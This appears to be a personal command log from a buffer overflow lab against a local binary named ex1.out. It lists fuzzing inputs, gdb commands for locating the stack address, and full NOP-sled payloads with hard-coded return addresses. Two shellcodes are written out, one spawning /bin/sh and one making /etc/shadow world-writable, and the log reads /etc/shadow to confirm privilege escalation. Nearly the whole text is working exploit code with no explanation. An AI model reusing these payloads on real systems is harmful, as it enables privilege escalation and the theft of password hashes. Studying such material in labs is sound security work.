whoami
cat /etc/shadow
ls -l /etc/shadow

./ex1.out
./ex1.out AAAA
./ex1.out $(python3 -c "print('A' * 511)")
./ex1.out $(python3 -c "print('A' * 512)")

sudo gdb ./ex1.out

list

disas main
run AAAA
disas main

run $(python3 -c "print('A' * 511)")
run $(python3 -c "print('A' * 512)")

break *0x565561f5

run $(python3 -c "print('A' * 512)")
x/600xb $esp

head of stack: 0xffffd208 -> \x0c\xd2\xff\xff

delete

run $(python3 -c "print('A' * 300 + 'B' * 4 + 'C' * 208)")

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 300 + b'\x42' * 4 + b'\x43' * 208)")

attack code:
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8b\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 255 + b'\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8b\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + b'\x8c\xd2\xff\xff' * 53)")

whoami
cat /etc/shadow
ls -l /etc/shadow
exit

chmod code:
\xeb\x17\x5e\x31\xc9\x88\x4e\x0b\x8d\x1e\x66\xb9\xb6\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe4\xff\xff\xff/etc/shadow

/home/tc/Desktop/BufferOverflow/ex1.out $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 259 + b'\xeb\x17\x5e\x31\xc9\x88\x4e\x0b\x8d\x1e\x66\xb9\xb6\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe4\xff\xff\xff/etc/shadow' + b'\x8c\xd2\xff\xff' * 53)")

ls -l /etc/shadow
cat /etc/shadow


[END]
